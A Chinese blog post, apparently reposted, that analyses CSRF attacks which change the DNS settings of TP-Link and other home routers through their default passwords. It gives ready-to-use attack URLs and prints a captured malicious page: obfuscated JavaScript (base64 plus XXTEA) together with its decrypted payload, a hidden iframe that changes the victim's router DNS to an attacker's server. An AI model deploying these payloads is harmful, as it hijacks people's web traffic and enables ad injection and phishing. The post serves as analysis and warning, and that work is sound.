DNS劫持TP-link漏洞利用
路由器安全不仅仅只是"病毒安全",因为它开放了Web端口,这意味Web层面的问题同样对它产生影响.这里说一种新型的攻击方式,在国内被应用的并不多,但因为电信猫存在超级用户的原因所以它可以造成很大的影响.
攻击流程:
1.你在访问到一个被嵌入到攻击代码的网页(这很容易做到).
2.攻击者利用跨域表单提交特性使用默认密码或路由器中内置的超级用户可以将你路由器中的DNS服务器进行修改.
3.修改DNS服务器意味着什么?意味着攻击者可以像电信运营商一样给你乱插广告,劫持你访问的网页.....
没有开WIFI,没有开对外访问端口是不是就安全了?
答案是否定的,因为上面的攻击流程并没有涉及到wifi和外网.
根本原因:
路由器厂商的安全意识还没有进化到Web2.0时代!
------------------------------------------------------------------------
TP-link攻击演示:


POC:http://jsbin.com/usovoz


该攻击利用了CSRF技术,Bogdan Calin在电子邮件中插入特定的URL,指向路由器默认的IP地址(通常为192.168.1.1),URL中包含一些参数,如修改DNS服务器的配置,完整的地址看起来如下:
http://admin:password@192.168.1.1/start_apply.htm?dnsserver=66.66.66.66

研究人员在华硕RT-N16、RT-N56U、TP-LINK TL-WR841N、Arcor EasyBox A 600等路由器上成功实施了改攻击,根据卡巴斯基实验室统计,在巴西越有450万台路由器存在该问题。-----------------------------------------http://mp.weixin.qq.com/mp/appmsg/show?__biz=MjM5NTUzMzMwMQ==&appmsgid=10000068&itemidx=1#wechat_redirect%29
这里提到的样本:
cdn.baidu.com.baidutings.com/61/index.asp
内容:
<script src="http://s20.cnzz.com/stat.php?id=5229865&web_id=5229865" language="JavaScript"></script>
<script language =javascript>
function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
function base64decode(str)
{var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = "";while(i<len)
{do
{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
function xxtea_decrypt(str,key){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
t="qa+JO3DSLWHP822m4ckX8f/gXA1eMoEi0mmyE+xiviaVb1A+i1oS1/77E73Bk1X06LEveQQxwqTfa/ZLA87S58TTbqsrKbvMv0rYdbM0pNAjUf+9erOyEA+bNqpusTX1wGWS3P3czE+k8eljPKaKUET0Ls9KEJZHKQ9mmYYZrvIC/lE7213ZknoTSJLuCg4DTPMrO1ajndG4lugm+JZHuhRdQrOxHWctDM2vOvqssKygAgIqkXeb2xgJg4bstObOVTovj3DR9yha5SgBf4kLwH2XsR0qnxKEiKoCYyThXdWJv0qLLKtJ1ZkopVvuY+s39tgvSCYfdaMA/Jc1wBKjfU7SgIG+Ou8q61i90twzAXtY92x59zPuWB8USiLJLOOJ2jgT6ZF6tuJ911p9PxpA9Ue5fjrPPnsJGxlGkQDh7L
bBY0uenZmtVsNxYZFpYVhjOO1dDR0WJujoBocadkOa/tBPI+uqw8KqaY0Ut4IcgDZDbuDTYgg5QmV1wGfCNas/TWMtnREs77WqzxpgTZ6qZNkM2kGJJVH2Y+KLfiMibjAFtn6ApagoPMgHTowVsJpvhwOgZ51QyRTpYABx2zBU+94TZxmE5Q2Xyk9Snj1m6H8z4hEloc/dUwi+z6HtkVD1yb7lYk0NnEQwo8wFQijPj1O5uP/yJ2mnKRPDHy+ofP3ev5WNDFjkliBwAzjgeivTaILIBAHJZj1tXQd0eHZZA2zq0Rmp6dN30emT84b6aExduJnQB4W6fDa6GcQi6dn7fHfmHOUL4WhlhVO1Tgj82K+NGxlOI6lMgFPQMQTHpxCXnGNUVwOBYC9r2Bfl3pdOMXDfc3nHxyoHFZfpX6TSSdSqFrHkC9G6UE04TVzYruURA6D6Keeet6sV1j9uTG6tvQd+0MmHjXngr1b3PX9YS+Gbe8nqB5Vr4ZiUTZ2RIegBW";
t=utf8to16(xxtea_decrypt(base64decode(t), 'javascript'));
document.write (t);
</script>

解密后:
<div style='display:none'>
<script type="text/javascript">
function goad() {
var Then = new Date() Then.setTime(Then.getTime() + 4 * 60 * 1000) var cookieString = new String(document.cookie) var cookieHeader = "Cookier1="
var beginPosition = cookieString.indexOf(cookieHeader) if (beginPosition != -1) {} else {
document.cookie = "Cookier1=Filter;expires=" + Then.toGMTString() document.write('<iframe src="http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=30&gateway=0.0.0.0&domain=&dnsserver=207.254.182.61&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6" width="100" height="200"></iframe>');
}
}
goad();
</script>
</div>
乌云:
http://paper.wooyun.org/bugs/wooyun-2010-037425
http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=121.157.39.111&dnsserver2=114.114.114.114&Save=%B1%A3+%B4%E6多次访问发现admin:admin,会变化,例如admin:123456,也就是利用路由器默认密码不断尝试修改路由器dns为121.157.39.111、114.114.114.114。
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:http://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 国防部:"台独"就意味着战争 4731347
- 2 春节期间小型客车免收高速通行费 4565750
- 3 朗朗吉娜官宣生子 4405949
- 4 吉林通化疫情"0号传染源"确认 4251740
- 5 国防部:遏制中国是不可能的 4102930
- 6 美日首脑通话提钓鱼岛 外交部回应 3959327
- 7 赵立坚连说3遍中国没有种族灭绝 3820751
- 8 世卫组织溯源专家组解除隔离 3557978
- 9 孕妇要求邻居关wifi对方要她搬家 3433449
- 10 吉林新增3例本地确诊病例 3313278